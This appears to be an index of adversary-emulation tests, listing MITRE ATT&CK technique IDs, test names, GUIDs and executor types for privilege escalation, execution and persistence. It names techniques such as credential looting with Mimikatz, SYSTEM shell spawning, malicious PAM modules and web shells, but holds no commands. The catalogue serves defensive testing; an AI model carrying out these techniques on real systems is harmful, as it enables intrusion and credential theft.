690 privilege-escalation T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows) 1 Logon Scripts d6042746-07d4-4c92-9ad8-e644c114a231 command_prompt
691 privilege-escalation T1547.008 Boot or Logon Autostart Execution: LSASS Driver 1 Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt 8ecef16d-d289-46b4-917b-0dba6dc81cf1 powershell
692 privilege-escalation T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
693 privilege-escalation T1078.004 Valid Accounts: Cloud Accounts 2 Azure Persistence Automation Runbook Created or Modified 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac powershell
694 privilege-escalation T1053.002 Scheduled Task/Job: At 1 At.exe Scheduled task 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 command_prompt
695 privilege-escalation T1053.002 Scheduled Task/Job: At 2 At - Schedule a job 7266d898-ac82-4ec0-97c7-436075d0d08e sh
696 privilege-escalation T1055.001 Process Injection: Dynamic-link Library Injection 1 Process Injection via mavinject.exe 74496461-11a1-4982-b439-4d87a550d254 powershell
697 privilege-escalation T1055.001 Process Injection: Dynamic-link Library Injection 2 WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique 8b56f787-73d9-4f1d-87e8-d07e89cbc7f5 powershell
698 privilege-escalation T1546.007 Event Triggered Execution: Netsh Helper DLL 1 Netsh Helper DLL Registration 3244697d-5a3a-4dfc-941c-550f69f91a4d command_prompt
699 privilege-escalation T1078.003 Valid Accounts: Local Accounts 1 Create local account with admin privileges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
700 privilege-escalation T1078.003 Valid Accounts: Local Accounts 2 Create local account with admin privileges - MacOS f1275566-1c26-4b66-83e3-7f9f7f964daa bash
701 privilege-escalation T1078.003 Valid Accounts: Local Accounts 3 Create local account with admin privileges using sysadminctl utility - MacOS 191db57d-091a-47d5-99f3-97fde53de505 bash
702 privilege-escalation T1078.003 Valid Accounts: Local Accounts 4 Enable root account using dsenableroot utility - MacOS 20b40ea9-0e17-4155-b8e6-244911a678ac bash
703 privilege-escalation T1078.003 Valid Accounts: Local Accounts 5 Add a new/existing user to the admin group using dseditgroup utility - macOS 433842ba-e796-4fd5-a14f-95d3a1970875 bash
704 privilege-escalation T1078.003 Valid Accounts: Local Accounts 6 WinPwn - Loot local Credentials - powerhell kittie 9e9fd066-453d-442f-88c1-ad7911d32912 powershell
705 privilege-escalation T1078.003 Valid Accounts: Local Accounts 7 WinPwn - Loot local Credentials - Safetykatz e9fdb899-a980-4ba4-934b-486ad22e22f4 powershell
706 privilege-escalation T1078.003 Valid Accounts: Local Accounts 8 Create local account (Linux) 02a91c34-8a5b-4bed-87af-501103eb5357 bash
707 privilege-escalation T1078.003 Valid Accounts: Local Accounts 9 Reactivate a locked/expired account (Linux) d2b95631-62d7-45a3-aaef-0972cea97931 bash
708 privilege-escalation T1078.003 Valid Accounts: Local Accounts 10 Login as nobody (Linux) 3d2cd093-ee05-41bd-a802-59ee5c301b85 bash
709 privilege-escalation T1574.012 Hijack Execution Flow: COR_PROFILER 1 User scope COR_PROFILER 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a powershell
710 privilege-escalation T1574.012 Hijack Execution Flow: COR_PROFILER 2 System Scope COR_PROFILER f373b482-48c8-4ce4-85ed-d40c8b3f7310 powershell
711 privilege-escalation T1574.012 Hijack Execution Flow: COR_PROFILER 3 Registry-free process scope COR_PROFILER 79d57242-bbef-41db-b301-9d01d9f6e817 powershell
712 execution T1053.005 Scheduled Task/Job: Scheduled Task 1 Scheduled Task Startup Script fec27f65-db86-4c2d-b66c-61945aee87c2 command_prompt
713 execution T1053.005 Scheduled Task/Job: Scheduled Task 2 Scheduled task Local 42f53695-ad4a-4546-abb6-7d837f644a71 command_prompt
714 execution T1053.005 Scheduled Task/Job: Scheduled Task 3 Scheduled task Remote 2e5eac3e-327b-4a88-a0c0-c4057039a8dd command_prompt
715 execution T1053.005 Scheduled Task/Job: Scheduled Task 4 Powershell Cmdlet Scheduled Task af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd powershell
716 execution T1053.005 Scheduled Task/Job: Scheduled Task 5 Task Scheduler via VBA ecd3fa21-7792-41a2-8726-2c5c673414d3 powershell
717 execution T1053.005 Scheduled Task/Job: Scheduled Task 6 WMI Invoke-CimMethod Scheduled Task e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b powershell
718 execution T1053.005 Scheduled Task/Job: Scheduled Task 7 Scheduled Task Executing Base64 Encoded Commands From Registry e895677d-4f06-49ab-91b6-ae3742d0a2ba command_prompt
719 execution T1053.005 Scheduled Task/Job: Scheduled Task 8 Import XML Schedule Task with Hidden Attribute cd925593-fbb4-486d-8def-16cbdf944bf4 powershell
720 execution T1053.005 Scheduled Task/Job: Scheduled Task 9 PowerShell Modify A Scheduled Task dda6fc7b-c9a6-4c18-b98d-95ec6542af6d powershell
721 execution T1047 Windows Management Instrumentation 1 WMI Reconnaissance Users c107778c-dcf5-47c5-af2e-1d058a3df3ea command_prompt
722 execution T1047 Windows Management Instrumentation 2 WMI Reconnaissance Processes 5750aa16-0e59-4410-8b9a-8a47ca2788e2 command_prompt
723 execution T1047 Windows Management Instrumentation 3 WMI Reconnaissance Software 718aebaa-d0e0-471a-8241-c5afa69c7414 command_prompt
724 execution T1047 Windows Management Instrumentation 4 WMI Reconnaissance List Remote Services 0fd48ef7-d890-4e93-a533-f7dedd5191d3 command_prompt
725 execution T1047 Windows Management Instrumentation 5 WMI Execute Local Process b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3 command_prompt
726 execution T1047 Windows Management Instrumentation 6 WMI Execute Remote Process 9c8ef159-c666-472f-9874-90c8d60d136b command_prompt
727 execution T1047 Windows Management Instrumentation 7 Create a Process using WMI Query and an Encoded Command 7db7a7f9-9531-4840-9b30-46220135441c command_prompt
728 execution T1047 Windows Management Instrumentation 8 Create a Process using obfuscated Win32_Process 10447c83-fc38-462a-a936-5102363b1c43 powershell
729 execution T1047 Windows Management Instrumentation 9 WMI Execute rundll32 00738d2a-4651-4d76-adf2-c43a41dfb243 powershell
730 execution T1047 Windows Management Instrumentation 10 Application uninstall using WMIC c510d25b-1667-467d-8331-a56d3e9bc4ff command_prompt
731 execution T1059.007 Command and Scripting Interpreter: JavaScript 1 JScript execution to gather local computer information via cscript 01d75adf-ca1b-4dd1-ac96-7c9550ad1035 command_prompt
732 execution T1059.007 Command and Scripting Interpreter: JavaScript 2 JScript execution to gather local computer information via wscript 0709945e-4fec-4c49-9faf-c3c292a74484 command_prompt
733 execution T1053.007 Kubernetes Cronjob 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
734 execution T1053.007 Kubernetes Cronjob 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
735 execution T1559.002 Inter-Process Communication: Dynamic Data Exchange 1 Execute Commands f592ba2a-e9e8-4d62-a459-ef63abd819fd manual
736 execution T1559.002 Inter-Process Communication: Dynamic Data Exchange 2 Execute PowerShell script via Word DDE 47c21fb6-085e-4b0d-b4d2-26d72c3830b3 command_prompt
737 execution T1559.002 Inter-Process Communication: Dynamic Data Exchange 3 DDEAUTO cf91174c-4e74-414e-bec0-8d60a104d181 manual
738 execution T1204.002 User Execution: Malicious File 1 OSTap Style Macro Execution 8bebc690-18c7-4549-bc98-210f7019efff powershell
739 execution T1204.002 User Execution: Malicious File 2 OSTap Payload Download 3f3af983-118a-4fa1-85d3-ba4daa739d80 command_prompt
740 execution T1204.002 User Execution: Malicious File 3 Maldoc choice flags command execution 0330a5d2-a45a-4272-a9ee-e364411c4b18 powershell
741 execution T1204.002 User Execution: Malicious File 4 OSTAP JS version add560ef-20d6-4011-a937-2c340f930911 powershell
742 execution T1204.002 User Execution: Malicious File 5 Office launching .bat file from AppData 9215ea92-1ded-41b7-9cd6-79f9a78397aa powershell
743 execution T1204.002 User Execution: Malicious File 6 Excel 4 Macro 4ea1fc97-8a46-4b4e-ba48-af43d2a98052 powershell
744 execution T1204.002 User Execution: Malicious File 7 Headless Chrome code execution via VBA a19ee671-ed98-4e9d-b19c-d1954a51585a powershell
745 execution T1204.002 User Execution: Malicious File 8 Potentially Unwanted Applications (PUA) 02f35d62-9fdc-4a97-b899-a5d9a876d295 powershell
746 execution T1204.002 User Execution: Malicious File 9 Office Generic Payload Download 5202ee05-c420-4148-bf5e-fd7f7d24850c powershell
747 execution T1204.002 User Execution: Malicious File 10 LNK Payload Download 581d7521-9c4b-420e-9695-2aec5241167f powershell
748 execution T1204.002 User Execution: Malicious File 11 Mirror Blast Emulation 24fd9719-7419-42dd-bce6-ab3463110b3c powershell
749 execution T1053.003 Scheduled Task/Job: Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
750 execution T1053.003 Scheduled Task/Job: Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
751 execution T1053.003 Scheduled Task/Job: Cron 3 Cron - Add script to /var/spool/cron/crontabs/ folder 2d943c18-e74a-44bf-936f-25ade6cccab4 bash
752 execution T1059.002 Command and Scripting Interpreter: AppleScript 1 AppleScript 3600d97d-81b9-4171-ab96-e4386506e2c2 sh
753 execution T1106 Native API 1 Execution through API - CreateProcess 99be2089-c52d-4a4a-b5c3-261ee42c8b62 command_prompt
754 execution T1106 Native API 2 WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique ce4e76e6-de70-4392-9efe-b281fc2b4087 powershell
755 execution T1106 Native API 3 WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique 7ec5b74e-8289-4ff2-a162-b6f286a33abd powershell
756 execution T1106 Native API 4 WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique e1f93a06-1649-4f07-89a8-f57279a7d60e powershell
757 execution T1610 Deploy a container 1 Deploy Docker container 59aa6f26-7620-417e-9318-589e0fb7a372 bash
758 execution T1609 Kubernetes Exec Into Container 1 ExecIntoContainer d03bfcd3-ed87-49c8-8880-44bb772dea4b bash
759 execution T1609 Kubernetes Exec Into Container 2 Docker Exec Into Container 900e2c49-221b-42ec-ae3c-4717e41e6219 bash
760 execution T1569.001 System Services: Launchctl 1 Launchctl 6fb61988-724e-4755-a595-07743749d4e2 bash
761 execution T1072 Software Deployment Tools 1 Radmin Viewer Utility b4988cad-6ed2-434d-ace5-ea2670782129 command_prompt
762 execution T1072 Software Deployment Tools 2 PDQ Deploy RAT e447b83b-a698-4feb-bed1-a7aaf45c3443 command_prompt
763 execution T1059.001 Command and Scripting Interpreter: PowerShell 1 Mimikatz f3132740-55bc-48c4-bcc0-758a459cd027 command_prompt
764 execution T1059.001 Command and Scripting Interpreter: PowerShell 2 Run BloodHound from local disk a21bb23e-e677-4ee7-af90-6931b57b6350 powershell
765 execution T1059.001 Command and Scripting Interpreter: PowerShell 3 Run Bloodhound from Memory using Download Cradle bf8c1441-4674-4dab-8e4e-39d93d08f9b7 powershell
766 execution T1059.001 Command and Scripting Interpreter: PowerShell 4 Obfuscation Tests 4297c41a-8168-4138-972d-01f3ee92c804 powershell
767 execution T1059.001 Command and Scripting Interpreter: PowerShell 5 Mimikatz - Cradlecraft PsSendKeys af1800cf-9f9d-4fd1-a709-14b1e6de020d powershell
768 execution T1059.001 Command and Scripting Interpreter: PowerShell 6 Invoke-AppPathBypass 06a220b6-7e29-4bd8-9d07-5b4d86742372 command_prompt
769 execution T1059.001 Command and Scripting Interpreter: PowerShell 7 Powershell MsXml COM object - with prompt 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da command_prompt
770 execution T1059.001 Command and Scripting Interpreter: PowerShell 8 Powershell XML requests 4396927f-e503-427b-b023-31049b9b09a6 command_prompt
771 execution T1059.001 Command and Scripting Interpreter: PowerShell 9 Powershell invoke mshta.exe download 8a2ad40b-12c7-4b25-8521-2737b0a415af command_prompt
772 execution T1059.001 Command and Scripting Interpreter: PowerShell 10 Powershell Invoke-DownloadCradle cc50fa2a-a4be-42af-a88f-e347ba0bf4d7 manual
773 execution T1059.001 Command and Scripting Interpreter: PowerShell 11 PowerShell Fileless Script Execution fa050f5e-bc75-4230-af73-b6fd7852cd73 powershell
774 execution T1059.001 Command and Scripting Interpreter: PowerShell 12 PowerShell Downgrade Attack 9148e7c4-9356-420e-a416-e896e9c0f73e powershell
775 execution T1059.001 Command and Scripting Interpreter: PowerShell 13 NTFS Alternate Data Stream Access 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680 powershell
776 execution T1059.001 Command and Scripting Interpreter: PowerShell 14 PowerShell Session Creation and Use 7c1acec2-78fa-4305-a3e0-db2a54cddecd powershell
777 execution T1059.001 Command and Scripting Interpreter: PowerShell 15 ATHPowerShellCommandLineParameter -Command parameter variations 686a9785-f99b-41d4-90df-66ed515f81d7 powershell
778 execution T1059.001 Command and Scripting Interpreter: PowerShell 16 ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments 1c0a870f-dc74-49cf-9afc-eccc45e58790 powershell
779 execution T1059.001 Command and Scripting Interpreter: PowerShell 17 ATHPowerShellCommandLineParameter -EncodedCommand parameter variations 86a43bad-12e3-4e85-b97c-4d5cf25b95c3 powershell
780 execution T1059.001 Command and Scripting Interpreter: PowerShell 18 ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments 0d181431-ddf3-4826-8055-2dbf63ae848b powershell
781 execution T1059.001 Command and Scripting Interpreter: PowerShell 19 PowerShell Command Execution a538de64-1c74-46ed-aa60-b995ed302598 command_prompt
782 execution T1059.001 Command and Scripting Interpreter: PowerShell 20 PowerShell Invoke Known Malicious Cmdlets 49eb9404-5e0f-4031-a179-b40f7be385e3 powershell
783 execution T1059.001 Command and Scripting Interpreter: PowerShell 21 PowerUp Invoke-AllChecks 1289f78d-22d2-4590-ac76-166737e1811b powershell
784 execution T1059.001 Command and Scripting Interpreter: PowerShell 22 Abuse Nslookup with DNS Records 999bff6d-dc15-44c9-9f5c-e1051bfc86e1 powershell
785 execution T1053.006 Scheduled Task/Job: Systemd Timers 1 Create Systemd Service and Timer f4983098-bb13-44fb-9b2c-46149961807b bash
786 execution T1053.006 Scheduled Task/Job: Systemd Timers 2 Create a user level transient systemd service and timer 3de33f5b-62e5-4e63-a2a0-6fd8808c80ec sh
787 execution T1053.006 Scheduled Task/Job: Systemd Timers 3 Create a system level transient systemd service and timer d3eda496-1fc0-49e9-aff5-3bec5da9fa22 sh
788 execution T1059.004 Command and Scripting Interpreter: Bash 1 Create and Execute Bash Shell Script 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873 sh
789 execution T1059.004 Command and Scripting Interpreter: Bash 2 Command-Line Interface d0c88567-803d-4dca-99b4-7ce65e7b257c sh
790 execution T1059.004 Command and Scripting Interpreter: Bash 3 Harvest SUID executable files 46274fc6-08a7-4956-861b-24cbbaa0503c sh
791 execution T1059.004 Command and Scripting Interpreter: Bash 4 LinEnum tool execution a2b35a63-9df1-4806-9a4d-5fe0500845f2 sh
792 execution T1059.004 Command and Scripting Interpreter: Bash 5 New script file in the tmp directory 8cd1947b-4a54-41fb-b5ea-07d0ace04f81 sh
793 execution T1059.004 Command and Scripting Interpreter: Bash 6 What shell is running 7b38e5cc-47be-44f0-a425-390305c76c17 sh
794 execution T1059.004 Command and Scripting Interpreter: Bash 7 What shells are available bf23c7dc-1004-4949-8262-4c1d1ef87702 sh
795 execution T1059.004 Command and Scripting Interpreter: Bash 8 Command line scripts b04ed73c-7d43-4dc8-b563-a2fc595cba1a sh
796 execution T1059.004 Command and Scripting Interpreter: Bash 9 Obfuscated command line scripts 5bec4cc8-f41e-437b-b417-33ff60acf9af sh
797 execution T1059.004 Command and Scripting Interpreter: Bash 10 Change login shell c7ac59cb-13cc-4622-81dc-6d2fee9bfac7 bash
798 execution T1059.004 Command and Scripting Interpreter: Bash 11 Environment variable scripts bdaebd56-368b-4970-a523-f905ff4a8a51 bash
799 execution T1059.004 Command and Scripting Interpreter: Bash 12 Detecting pipe-to-shell fca246a8-a585-4f28-a2df-6495973976a1 bash
800 execution T1559 Inter-Process Communication 1 Cobalt Strike Artifact Kit pipe bd13b9fc-b758-496a-b81a-397462f82c72 command_prompt
801 execution T1559 Inter-Process Communication 2 Cobalt Strike Lateral Movement (psexec_psh) pipe 830c8b6c-7a70-4f40-b975-8bbe74558acd command_prompt
802 execution T1559 Inter-Process Communication 3 Cobalt Strike SSH (postex_ssh) pipe d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6 command_prompt
803 execution T1559 Inter-Process Communication 4 Cobalt Strike post-exploitation pipe (4.2 and later) 7a48f482-246f-4aeb-9837-21c271ebf244 command_prompt
804 execution T1559 Inter-Process Communication 5 Cobalt Strike post-exploitation pipe (before 4.2) 8dbfc15c-527b-4ab0-a272-019f469d367f command_prompt
805 execution T1204.003 User Execution: Malicious Image 1 Malicious Execution from Mounted ISO Image e9795c8d-42aa-4ed4-ad80-551ed793d006 powershell
806 execution T1059.006 Command and Scripting Interpreter: Python 1 Execute shell script via python's command mode arguement 3a95cdb2-c6ea-4761-b24e-02b71889b8bb sh
807 execution T1059.006 Command and Scripting Interpreter: Python 2 Execute Python via scripts (Linux) 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8 sh
808 execution T1059.006 Command and Scripting Interpreter: Python 3 Execute Python via Python executables (Linux) 0b44d79b-570a-4b27-a31f-3bf2156e5eaa sh
809 execution T1059.006 Command and Scripting Interpreter: Python 4 Python pty module and spawn function used to spawn sh or bash 161d694c-b543-4434-85c3-c3a433e33792 bash
810 execution T1059.003 Command and Scripting Interpreter: Windows Command Shell 1 Create and Execute Batch Script 9e8894c0-50bd-4525-a96c-d4ac78ece388 powershell
811 execution T1059.003 Command and Scripting Interpreter: Windows Command Shell 2 Writes text to a file and displays it. 127b4afe-2346-4192-815c-69042bec570e command_prompt
812 execution T1059.003 Command and Scripting Interpreter: Windows Command Shell 3 Suspicious Execution via Windows Command Shell d0eb3597-a1b3-4d65-b33b-2cda8d397f20 command_prompt
813 execution T1059.003 Command and Scripting Interpreter: Windows Command Shell 4 Simulate BlackByte Ransomware Print Bombing 6b2903ac-8f36-450d-9ad5-b220e8a2dcb9 powershell
814 execution T1059.003 Command and Scripting Interpreter: Windows Command Shell 5 Command Prompt read contents from CMD file and execute df81db1b-066c-4802-9bc8-b6d030c3ba8e command_prompt
815 execution T1059.005 Command and Scripting Interpreter: Visual Basic 1 Visual Basic script execution to gather local computer information 1620de42-160a-4fe5-bbaf-d3fef0181ce9 powershell
816 execution T1059.005 Command and Scripting Interpreter: Visual Basic 2 Encoded VBS code execution e8209d5f-e42d-45e6-9c2f-633ac4f1eefa powershell
817 execution T1059.005 Command and Scripting Interpreter: Visual Basic 3 Extract Memory via VBA 8faff437-a114-4547-9a60-749652a03df6 powershell
818 execution T1569.002 System Services: Service Execution 1 Execute a Command as a Service 2382dee2-a75f-49aa-9378-f52df6ed3fb1 command_prompt
819 execution T1569.002 System Services: Service Execution 2 Use PsExec to execute a command on a remote host 873106b7-cfed-454b-8680-fa9f6400431c command_prompt
820 execution T1569.002 System Services: Service Execution 3 psexec.py (Impacket) edbcd8c9-3639-4844-afad-455c91e95a35 bash
821 execution T1569.002 System Services: Service Execution 4 BlackCat pre-encryption cmds with Lateral Movement 31eb7828-97d7-4067-9c1e-c6feb85edc4b powershell
822 execution T1569.002 System Services: Service Execution 5 Use RemCom to execute a command on a remote host a5d8cdeb-be90-43a9-8b26-cc618deac1e0 command_prompt
823 execution T1569.002 System Services: Service Execution 6 Snake Malware Service Create b8db787e-dbea-493c-96cb-9272296ddc49 command_prompt
824 execution T1053.002 Scheduled Task/Job: At 1 At.exe Scheduled task 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 command_prompt
825 execution T1053.002 Scheduled Task/Job: At 2 At - Schedule a job 7266d898-ac82-4ec0-97c7-436075d0d08e sh
826 persistence T1053.005 Scheduled Task/Job: Scheduled Task 1 Scheduled Task Startup Script fec27f65-db86-4c2d-b66c-61945aee87c2 command_prompt
827 persistence T1053.005 Scheduled Task/Job: Scheduled Task 2 Scheduled task Local 42f53695-ad4a-4546-abb6-7d837f644a71 command_prompt
828 persistence T1053.005 Scheduled Task/Job: Scheduled Task 3 Scheduled task Remote 2e5eac3e-327b-4a88-a0c0-c4057039a8dd command_prompt
829 persistence T1053.005 Scheduled Task/Job: Scheduled Task 4 Powershell Cmdlet Scheduled Task af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd powershell
830 persistence T1053.005 Scheduled Task/Job: Scheduled Task 5 Task Scheduler via VBA ecd3fa21-7792-41a2-8726-2c5c673414d3 powershell
831 persistence T1053.005 Scheduled Task/Job: Scheduled Task 6 WMI Invoke-CimMethod Scheduled Task e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b powershell
832 persistence T1053.005 Scheduled Task/Job: Scheduled Task 7 Scheduled Task Executing Base64 Encoded Commands From Registry e895677d-4f06-49ab-91b6-ae3742d0a2ba command_prompt
833 persistence T1053.005 Scheduled Task/Job: Scheduled Task 8 Import XML Schedule Task with Hidden Attribute cd925593-fbb4-486d-8def-16cbdf944bf4 powershell
834 persistence T1053.005 Scheduled Task/Job: Scheduled Task 9 PowerShell Modify A Scheduled Task dda6fc7b-c9a6-4c18-b98d-95ec6542af6d powershell
835 persistence T1556.003 Modify Authentication Process: Pluggable Authentication Modules 1 Malicious PAM rule 4b9dde80-ae22-44b1-a82a-644bf009eb9c sh
836 persistence T1556.003 Modify Authentication Process: Pluggable Authentication Modules 2 Malicious PAM module 65208808-3125-4a2e-8389-a0a00e9ab326 sh
837 persistence T1546.013 Event Triggered Execution: PowerShell Profile 1 Append malicious start-process cmdlet 090e5aa5-32b6-473b-a49b-21e843a56896 powershell
838 persistence T1133 External Remote Services 1 Running Chrome VPN Extensions via the Registry 2 vpn extension 4c8db261-a58b-42a6-a866-0a294deedde4 powershell
839 persistence T1053.007 Kubernetes Cronjob 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
840 persistence T1053.007 Kubernetes Cronjob 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
841 persistence T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness 1 Service Registry Permissions Weakness f7536d63-7fd4-466f-89da-7e48d550752a powershell
842 persistence T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness 2 Service ImagePath Change with reg.exe f38e9eea-e1d7-4ba6-b716-584791963827 command_prompt
843 persistence T1547 Boot or Logon Autostart Execution 1 Add a driver cb01b3da-b0e7-4e24-bf6d-de5223526785 command_prompt
844 persistence T1547.014 Active Setup 1 HKLM - Add atomic_test key to launch executable as part of user setup deff4586-0517-49c2-981d-bbea24d48d71 powershell
845 persistence T1547.014 Active Setup 2 HKLM - Add malicious StubPath value to existing Active Setup Entry 39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a powershell
846 persistence T1547.014 Active Setup 3 HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number 04d55cef-f283-40ba-ae2a-316bc3b5e78c powershell
847 persistence T1543.003 Create or Modify System Process: Windows Service 1 Modify Fax service to run PowerShell ed366cde-7d12-49df-a833-671904770b9f command_prompt
848 persistence T1543.003 Create or Modify System Process: Windows Service 2 Service Installation CMD 981e2942-e433-44e9-afc1-8c957a1496b6 command_prompt
849 persistence T1543.003 Create or Modify System Process: Windows Service 3 Service Installation PowerShell 491a4af6-a521-4b74-b23b-f7b3f1ee9e77 powershell
850 persistence T1543.003 Create or Modify System Process: Windows Service 4 TinyTurla backdoor service w64time ef0581fd-528e-4662-87bc-4c2affb86940 command_prompt
851 persistence T1543.003 Create or Modify System Process: Windows Service 5 Remote Service Installation CMD fb4151a2-db33-4f8c-b7f8-78ea8790f961 command_prompt
852 persistence T1053.003 Scheduled Task/Job: Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
853 persistence T1053.003 Scheduled Task/Job: Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
854 persistence T1053.003 Scheduled Task/Job: Cron 3 Cron - Add script to /var/spool/cron/crontabs/ folder 2d943c18-e74a-44bf-936f-25ade6cccab4 bash
855 persistence T1137 Office Application Startup 1 Office Application Startup - Outlook as a C2 bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c command_prompt
856 persistence T1574.001 Hijack Execution Flow: DLL Search Order Hijacking 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
857 persistence T1137.006 Office Application Startup: Add-ins 1 Code Executed Via Excel Add-in File (XLL) 441b1a0f-a771-428a-8af0-e99e4698cda3 powershell
858 persistence T1137.006 Office Application Startup: Add-ins 2 Persistent Code Execution Via Excel Add-in File (XLL) 9c307886-9fef-41d5-b344-073a0f5b2f5f powershell
859 persistence T1137.006 Office Application Startup: Add-ins 3 Persistent Code Execution Via Word Add-in File (WLL) 95408a99-4fa7-4cd6-a7ef-cb65f86351cf powershell
860 persistence T1137.006 Office Application Startup: Add-ins 4 Persistent Code Execution Via Excel VBA Add-in File (XLAM) 082141ed-b048-4c86-99c7-2b8da5b5bf48 powershell
861 persistence T1137.006 Office Application Startup: Add-ins 5 Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM) f89e58f9-2b49-423b-ac95-1f3e7cfd8277 powershell
862 persistence T1505.002 Server Software Component: Transport Agent 1 Install MS Exchange Transport Agent Persistence 43e92449-ff60-46e9-83a3-1a38089df94d powershell
863 persistence T1556.002 Modify Authentication Process: Password Filter DLL 1 Install and Register Password Filter DLL a7961770-beb5-4134-9674-83d7e1fa865c powershell
864 persistence T1505.005 Server Software Component: Terminal Services DLL 1 Simulate Patching termsrv.dll 0b2eadeb-4a64-4449-9d43-3d999f4a317b powershell
865 persistence T1176 Browser Extensions 1 Chrome (Developer Mode) 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 manual
866 persistence T1176 Browser Extensions 2 Chrome (Chrome Web Store) 4c83940d-8ca5-4bb2-8100-f46dc914bc3f manual
867 persistence T1176 Browser Extensions 3 Firefox cb790029-17e6-4c43-b96f-002ce5f10938 manual
868 persistence T1176 Browser Extensions 4 Edge Chromium Addon - VPN 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5 manual
869 persistence T1176 Browser Extensions 5 Google Chrome Load Unpacked Extension With Command Line 7a714703-9f6b-461c-b06d-e6aeac650f27 powershell
870 persistence T1546.011 Event Triggered Execution: Application Shimming 1 Application Shim Installation 9ab27e22-ee62-4211-962b-d36d9a0e6a18 command_prompt
871 persistence T1546.011 Event Triggered Execution: Application Shimming 2 New shim database files created in the default shim database directory aefd6866-d753-431f-a7a4-215ca7e3f13d powershell
872 persistence T1546.011 Event Triggered Execution: Application Shimming 3 Registry key creation and/or modification events for SDB 9b6a06f9-ab5e-4e8d-8289-1df4289db02f powershell
873 persistence T1547.010 Boot or Logon Autostart Execution: Port Monitors 1 Add Port Monitor persistence in Registry d34ef297-f178-4462-871e-9ce618d44e50 command_prompt
874 persistence T1037.002 Boot or Logon Initialization Scripts: Logon Script (Mac) 1 Logon Scripts - Mac f047c7de-a2d9-406e-a62b-12a09d9516f4 manual
875 persistence T1547.009 Boot or Logon Autostart Execution: Shortcut Modification 1 Shortcut Modification ce4fc678-364f-4282-af16-2fb4c78005ce command_prompt
876 persistence T1547.009 Boot or Logon Autostart Execution: Shortcut Modification 2 Create shortcut to cmd in startup folders cfdc954d-4bb0-4027-875b-a1893ce406f2 powershell
877 persistence T1547.005 Boot or Logon Autostart Execution: Security Support Provider 1 Modify SSP configuration in registry afdfd7e3-8a0b-409f-85f7-886fdf249c9e powershell
878 persistence T1543.004 Create or Modify System Process: Launch Daemon 1 Launch Daemon 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf bash
879 persistence T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking 1 powerShell Persistence via hijacking default modules - Get-Variable.exe 1561de08-0b4b-498e-8261-e922f3494aae powershell
880 persistence T1505.003 Server Software Component: Web Shell 1 Web Shell Written to Disk 0a2ce662-1efa-496f-a472-2fe7b080db16 command_prompt
881 persistence T1078.001 Valid Accounts: Default Accounts 1 Enable Guest account with RDP capability and admin privileges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
882 persistence T1078.001 Valid Accounts: Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
883 persistence T1078.001 Valid Accounts: Default Accounts 3 Enable Guest Account on macOS 0315bdff-4178-47e9-81e4-f31a6d23f7e4 command_prompt
884 persistence T1547.003 Time Providers 1 Create a new time provider df1efab7-bc6d-4b88-8be9-91f55ae017aa powershell
885 persistence T1547.003 Time Providers 2 Edit an existing time provider 29e0afca-8d1d-471a-8d34-25512fc48315 powershell
886 persistence T1546.005 Event Triggered Execution: Trap 1 Trap EXIT a74b2e07-5952-4c03-8b56-56274b076b61 sh
887 persistence T1546.005 Event Triggered Execution: Trap 2 Trap SIGINT a547d1ba-1d7a-4cc5-a9cb-8d65e8809636 sh
888 persistence T1574.006 Hijack Execution Flow: LD_PRELOAD 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
889 persistence T1574.006 Hijack Execution Flow: LD_PRELOAD 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
